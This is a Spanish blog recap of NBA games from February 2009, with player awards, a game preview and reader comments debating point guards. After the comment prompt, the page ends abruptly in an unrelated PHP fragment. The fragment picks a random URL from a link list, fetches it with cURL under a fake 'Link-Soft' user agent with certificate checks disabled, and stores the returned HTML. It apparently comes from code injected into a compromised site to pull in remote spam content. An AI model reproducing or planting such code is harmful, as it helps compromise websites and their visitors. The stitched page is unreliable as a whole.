La crónica (23/02/2009)

24 de February de 2009 por MagicJohnson32

Por TheDeerHunter & MagicJohnson32

La de la pasada madrugada fue una inesperada gran jornada, visto el menú que había programado. Corta e intensa, como a nosotros nos gusta para explayarnos con la crónica.

De entrada, en el partido más interesante los Celtics dieron un puñetazo encima de la mesa, como sólo hace poco dieron los Lakers. Sin Garnett se esperaba poco menos que una encerrona en Denver. Nada más lejos de la realidad: los campeones, dirigidos magistralmente desde la defensa por un Rondo que le dio un baño a Billups de los que le escuecen durante semanas, apalizaron con saña a los locales. Se demostró que ahora mismo pesa mucho más la baja de Nené que la baja de KG y un equipo tan ofensivo como los Nuggets se quedó en tan sólo 76 puntos. A ese nivel defensivo, apenas nadie está capacitado para vencer a los verdes y Rondo es el termómetro sobre el que se mide este equipo.

Después fuimos testigos de esta inverosímil canasta ganadora de Harris desde su propio campo:

Antes de eso, Harris ya había anotado 36 puntos más y 8 asistencias, peleando prácticamente él solo contra unos Sixers que no jugaron nada mal. A ver si este “milagro” les sirve para levantar cabeza. La lucha por la postemporada en el Este no será lo mismo sin ellos.

Otros dos equipos que parecen estar levantando cabeza son Utah y New Orleans. Los primeros volvieron a hacer valer su fortín para destrozar a Atlanta. En esta ocasión la segunda unidad, con Korver, Millsap, Harpring y Kirilenko, resultó un factor determinante al anotar más de la mitad de los puntos y triturar la harpringintimidada defensa de los visitantes, que acumulan 15 derrotas consecutivas en Salt Lake City. Boozer debutó anoche tras su larga lesión, aunque el contexto le permitió tomárselo con calma. Por parte de Atlanta, Bibby, enfermo, apenas aportó nada y Josh Smith fue expulsado en el último cuarto tras una terrible falta a Harpring.

New Orleans también celebró la vuelta de Chandler con un gran partido en Sacramento. No terminamos de entender qué es lo que ha pasado con este jugador, pero anoche hizo un grandísimo partido y sus compañeros lo agradecieron funcionando a las mil maravillas. A las malas, el rendimiento deportivo del equipo sale ganando de todo este asunto, sin duda.

Finalmente, hasta los equipos más humildes que actuaban anoche nos dejaron un grandísimo sabor de boca. Espectacular duelo (cómo no) con los Knicks recibiendo a Indiana. Increíble rendimiento de la pareja Marquis Daniels-Jarret Jack, aunque no pudieron prevalecer frente al alucinante partido de Nate Robinson, que ahora mismo es candidato firme a varios premios.

Partidazo también el que se jugó en el Staples, en esta ocasión de la mano de la triada asesina Eric Gordon, Baron Davis y “Orko” Randolph. Eso sí… fue frente a los Warriors que no se caracterizan precisamente por morder en defensa.

PREMIOS

MVP: Nate Robinson podría perfectamente llevarse el galardón con sus 41 puntos, 8 rebotes y 3 asistencias, pero consideramos de mayor mérito la actuación de Devin Harris, que se fue a los 39 puntos y 8 asistencias en un partido de mucha menos anotación que el de los Knicks y que se decidió con la increíble canasta del base de los Nets desde más allá del centro del campo.dharrisiguodharrishotdharrisbuzzer

El rookie: 27 puntos con 6 de 7 en triples, 7 rebotes y 5 asistencias logró Eric Gordon, más que suficientes para llevarse el premio al mejor debutante del día.

La sorpresa: Empezábamos a olvidar las cosas que sabe hacer Baron Davis. Anoche, tal vez motivado por la visita de sus ex, nos lo recordó con 25 puntos, 4 de 6 en triples, 10 asistencias, 9 rebotes y 4 recuperaciones.

La decepción: Menudo repaso se llevó Chauncey Billups de Rajon Rondo. Se quedó en 3 puntos con 1 de 8 en tiros, 5 asistencias y 4 pérdidas sin rebotes ni robos en 34 minutos de juego, en los que su equipo se llevó un parcial de -38.

El mayor esfuerzo en vano: Un habitual de este premio, Kevin Martin, se fue a los 32 puntos y 5 asistencias en la derrota de los Kings ante los Hornets.

RAZONES PARA TRASNOCHARdiawjamison

Se disputan ocho encuentros la próxima madrugada y hay varios realmente interesantes. Nos quedamos con éste:

Mavs @ Spurs. Un clásico moderno, el duelo texano se presenta bastante incierto por los recientes resultados de ambos equipos y la ausencia de Manu Ginóbili en los de Popovich. El equipo dirigido por Carlisle llega con mayores urgencias, dado lo apretado de la lucha por las última plazas de Playoffs en el Oeste. Además, en los dos precedentes jugados esta misma temporada, uno jugado en Dallas y otro en San Antonio, la victoria ha sido para el equipo visitante. A partir de las 2:30 horas veremos si se mantiene la tendencia.

El jugador que recomendamos seguir de cerca es… Boris Diaw. El francés, que visita Phoenix por primera vez desde su traspaso, acostumbra a brillar ante sus ex equipos, como ya demostró ante los Suns el pasado 23 de enero. Además, el regreso del run & gun al juego de los de Arizona le puede facilitar las cosas. El partido se disputará a partir de las 3:00, hora peninsular.

Comenta

7 comentarios a esta entrada

  1. Landrusski dice:
    #1

    hOLA WENAS OTRA VEZ POR ESTOS LARES…YA ESTOY DE VUELTA COMENTANDO EN EL BLOG DESPUES DE UN TIEMPO..(NO ESKE NO OS HAYA ESTADO LEYENDO TODOS LOS DIAS,ESKE SE ME JODIO EL ORDENA JAJA).YO KIERO MENCIONAR A RAJON RONDO KE VERDADERAMENTE ME PARECE UN BASE ESPECTACULAR…REBOTEA COMO NADIE,TIENE UNA BUENA VISION DE JUEGO,UN FISICO ESPECTACULAR PARA ENTRAR A CNASTA Y ECIMA ESTA MEJORANDO SU MUÑECA DIA A DIA,SINCERAMENTE LE VEO ENTRE LOS 5 MEJORES BASES DE LA COMPETICION….NOSE KE PENSAIS VOSOTROS?

      Citar

  2. Viva_Dirk dice:
    #2

    Ufff, yo lo veo lejos de los 5 mejores bases de la competición. Para mi casi todo lo que dices es verdad, pero me parece que está tremendamente favorecido por el equipo que le rodea. Creo que son mejores que es Paul, D-Will, Baron Davis, Billups, Harris, Calderon y Nash, y no creo que este por encima de gente como Miller, Nelson o Parker.

    Yo venia a decir que no entiendo como un tio tan limitado como Robinson hace esas puntuaciones, el tio es un pasador como mucho regular, como tirador también y coño frenar sus penetraciones tampoco es tan dificil. Me parece un chupón infumable, en pocas palabras.

      Citar

  3. MagicJohnson32 dice:
    #3

    Hola Landrusski

    Estoy con Viva: a Rondo aún le queda lejos el Top-5. Eso sí, en defensa me parece el mejor base de la liga, creo que ya lo había comentado.

    Y a mí tampoco me gusta Nate lo más mínimo, pero no creo que sea fácil de parar cuando está en racha. Se beneficia mucho del estilo D’Antoni.

      Citar

  4. Toni dice:
    #4

    Rondo tuvo una racha al inicio de la competición en la que encadenava partidazo tras partidazo pero poco a poco se fué diluyendo… A mi me parece un muy buen jugador pero por supuesto estando por debajo de CP3 y J.Williams (a un nivel impresionante por cierto), que para mi son los mejores en su sitio.Luego vienen unos cuantos bases que son buenos directores de juego como calderon, billups y otros que son mas anotadores como Parker, Harris…
    Me gusta Mo Williams, pero en un equipo donde todo lo hace y lo deshace LeBron, no creo que alcance su mejor nivel (aunque ha realizado tremendos partidazos este año).

    PD: Pau repite como jugador de la semana en el Oeste aunque ultimamente está un poco fallon en el tiro pero sigue siendo un crack!

      Citar

  5. Landrusski dice:
    #5

    Hola gente bueno a mi rondo me parece un escalon por debajo de CP3 , D.Williams,Calderon, y a la misma altuya ke billups,parker y demas…nose es mi opinion y de hecho creo ke le perjudica mas ke este en los celtics ke no en otro ekipo con menos “estrellas” solo es mi opinion nose…

    PD:Me voy al calderon a ver a mi atleti haber si ganamos al oporto ke madre mia…jejeje un saludo

      Citar

  6. aro_pasado_no_newtoniano dice:
    #6

    ¿Hay buenas clínicas para transplante de cerebros en Boston?

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    Forza al.letí¡¡¡¡¡¡¡¡ (¿se dice al.letí, no? (como si fuese egeminada))

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>